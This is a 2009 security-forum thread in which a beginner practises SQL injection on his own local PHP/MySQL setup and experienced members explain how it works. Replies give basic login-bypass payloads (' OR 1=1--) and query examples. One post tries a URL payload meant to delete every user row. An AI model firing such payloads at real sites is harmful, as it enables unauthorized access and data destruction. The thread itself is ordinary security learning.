| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 244 
  Members: 0 
  Total: 244 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Basic SQL Injection |  |  
	| 
	
		|  Posted: Wed Feb 25, 2009 11:08 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Cool_Man |  | Beginner |  |  
  |  |  |  | Joined: Feb 26, 2009 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hi 
 I'm trying to learn SQL injection (spent 4-5 hours). I have setup a basic
 
 PHP+APACHE+MYSQL development area; with a user table and a basic front end using PHP.
 
 I'm trying to do the basic SQL injection, where I'm inserting
 
 
 inside one of the inputs. The result I'm getting is
 
 
  	  | Code: |  	  | Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\xampp\login.php on line 20 --- Incorrect Username or Password ---
 | 
 
 However, I dont quite get how this is a exploit... (i know it sounds stupid)
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Feb 25, 2009 11:16 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| slsl |  | Advanced user |  |  
  |  |  |  | Joined: Oct 14, 2008 |  | Posts: 66 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| try different things what it is saying with that error is that your syntax is wrong try: 
 
  	  | Code: |  	  | ' OR 1=1--+
 " OR 1=1--+
 
 | 
 it has to do with how your statment in the code is set up if your code was
 
 
 
  	  | Code: |  	  | SELECT * FROM USERS WHERE password = ' . $pass .' ORDER BY DESC
 
 | 
 
 you would use something like ' OR 1=1 --+
 
 SQL injection is a common security flaw in sites where the don't sanitize user input that goes into SQL queries.  This allows users to manipulate that database and the returned input in many ways, that is why I would call it an exploit.
 
 i recommend you visit a tutorial like http://www.securiteam.com/securityreviews/5DP0N1P76E.html
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Thu Feb 26, 2009 12:10 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Cool_Man |  | Beginner |  |  
  |  |  |  | Joined: Feb 26, 2009 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| 
 Now i got three senarios
 
 
 
 
 If i use the above for both input boxes, I login as normal 
 If I use it on only one inpux box, I dont login in however get error message 
 If i use normal invalid username and password, i dont login with no error message |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Thu Feb 26, 2009 1:06 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| slsl |  | Advanced user |  |  
  |  |  |  | Joined: Oct 14, 2008 |  | Posts: 66 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| that would be because how the SQL query is formed. 
 say the query is
 
 
 
  	  | Code: |  	  | SELECT * FROM users WHERE username = ' . $user . ' AND password = ' . $pass . ' | 
 
 when you use ' OR 1=1 --+ you are saying Grab the user from users table where username is NULL or if 1=1 grab a user.  since 1=1 is always true it will grab all users in the database.  if you use invalid info it is saying grab the user with that username AND that password but since it does not exist it returns NULL.  Also you should know that the -- is the comment symbol in SQL so it disregards anything after the "--"
 
 If you don't really know how SQL works and how to form statements use http://www.w3schools.com/sql/ I Would recommend that site for almost any web programming language
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Fri Feb 27, 2009 11:39 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Cool_Man |  | Beginner |  |  
  |  |  |  | Joined: Feb 26, 2009 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Thanks for the help 
 I have done few experiments on UNION ALL SELECT and blind injection (brute...)
 
 Don't want to sound stupid but, is it possible to INSERT and DELETE data from the URL? because I have not managed to do it.
 
 What I have tried
 
 
  	  | Code: |  	  | www.example.com/users.php?id=2'; DELETE FROM users WHERE 1 or username = '"; 
 | 
 
 Thanks
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Feb 28, 2009 2:27 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| In case of Mysql/Php you can't use stacked sql queries (separated by ; ). So you can manipulate with UPDATE only if there is sql injection in UPDATE query and same for INSERT and DELETE. |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |